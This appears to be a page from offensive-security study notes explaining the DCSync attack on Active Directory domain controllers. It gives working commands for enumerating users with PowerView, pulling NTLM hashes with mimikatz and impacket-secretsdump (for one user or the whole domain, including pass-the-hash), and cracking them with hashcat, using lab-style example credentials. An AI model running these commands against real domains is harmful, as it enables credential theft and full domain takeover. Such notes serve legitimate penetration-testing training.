Domain controller synchronization (Dcsync attack)

Dcsync attack:

In an environment, there can be more than one domain controller to provide redundancy. The Directory Replication Service (RDS) remote protocol is used to synchronize the multiple domain control. The best part is that the domain controller receiving a request for an update does not check whether the request came from a known domain controller. Instead, it only verifies that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user with certain rights it will succeed.

To perform this attack user must have below rights:

Replicating Directory Changes
Replicating Directory Changes All
Replicating Directory Changes in Filtered Set

The good news is that the below group has these permissions set by default:

Domain Admins
Enterprise Admins
Administrators

This attack allows us to request any user credentials from the domain.

You can find domain users using the way shown in manual enumeration or using powerview.ps1:

Import-Module .\PowerView.ps1 # Loading the powerview module.
Get-NetUser | select cn

Active Directory Domain Enumeration Part-1 With PowerviewNoRed0x

Ensure that the user of the credential provided is part of one of the three groups mentioned above.

Way 1: using mimikatz on domain joined windows

# Run mimiaktz command:
# We will specify the user whose credentials we want to fetch.
# Command:
.\mimikatz.exe "lsadump::dcsync /user:<domain_name>\<username>"
# example: .\mimikatz.exe "lsadump::dcsync /user:corp\dave"

# we can crack found Hash NTLM using hashcat:
hashcat -m 1000 hashes.dcsync /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Similarly we can get the credential for any user in the domain even Administrator.

Way 2: From Kali Linux using impacket-secretsdump

# Give target user name in `-just-dc-user` 
# provide credentials in this format: domain/user:password@ip
# Example:
impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.237.70


# you will get NTLM hash for the user in below format:
# example: dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::

Fetch all user hashes

# Dumping all users' hashes at once from NTDS.DIT
# Condition for DCsync attack applies here.
impacket-secretsdump -just-dc medtech.com/leon:"rabbit:)"@$dc01

# can also use -just-dc-ntlm flag for ntlm only for all users

# We can also use hash for authentication.
impacket-secretsdump -just-dc beyond.com/[email protected] -hashes :8480fa6ca85394df498139fe5ca02b95

PreviousSilver Tickets NextLateral Movement in AD

Last updated 1 year ago